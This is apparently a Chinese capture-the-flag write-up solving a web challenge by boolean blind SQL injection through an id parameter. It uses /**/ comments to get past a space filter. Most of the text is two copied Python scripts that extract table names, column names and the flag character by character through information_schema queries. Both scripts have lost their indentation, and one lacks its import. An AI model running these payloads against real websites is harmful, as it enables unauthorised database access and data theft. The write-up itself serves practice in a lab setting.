打开题目后,有三个文章
随便点一个之后发现网址上有个后缀 ?id=2
应该是get传参的注入了
在后缀上加 ?id=1||1 显示全部文章,可能是整形注入,还是盲注
他这个过滤了空格,用/**/代替(详见web6 wp)
盲注都是一个字一个字对比,很麻烦,所以这里用大佬的脚本做题
import requests
s=requests.session()
url='http://376f6454-37f5-47df-aa98-bfd375f0f8d9.challenge.ctf.show/index.php'
table=""
for i in range(1,45):
print(i)
for j in range(31,128):
#爆表名 flag
payload = "ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database())from/**/%s/**/for/**/1))=%s#"%(str(i),str(j))
#爆字段名 flag
#payload = "ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x666C6167)from/**/%s/**/for/**/1))=%s#"%(str(i),str(j))
#读取flag
#payload = "ascii(substr((select/**/flag/**/from/**/flag)from/**/%s/**/for/**/1))=%s#"%(str(i), str(j))
ra = s.get(url=url + '?id=0/**/or/**/' + payload).text
if 'I asked nothing' in ra:
table += chr(j)
print(table)
break
附上羽师傅的脚本
url = "http://124.156.121.112:28069/?id=-1'/**/"
def db(url): #爆库名
for i in range(1,5):
for j in range(32,128):
u= "or/**/ascii(substr(database()/**/from/**/"+str(i)+"/**/for/**/1))="+str(j)+"#"
s = url+u
print(s)
r = requests.get(s)
if 'By Rudyard Kipling' in r.text:
print(chr(j))
def table(url): #爆表名
for i in range(4):
table_name=''
for j in range(1,6):
for k in range(48,128):
u=id="||/**/ascii(substr((select/**/table_name/**/from/**/information_schema.tables/**/where/**/table_schema=database()/**/limit/**/1/**/offset/**/"+str(i)+")/**/from/**/"+str(j)+"/**/for/**/1))="+str(k)+"#"
s = url+u
print(s)
r = requests.get(s)
if 'By Rudyard Kipling' in r.text:
table_name+=chr(k)
print(table_name)
依次跑得数据表,字段名,字段的值
运行了好几次,一直是到这一步就停了,就补充了个反括号去提交flag
竟然通过了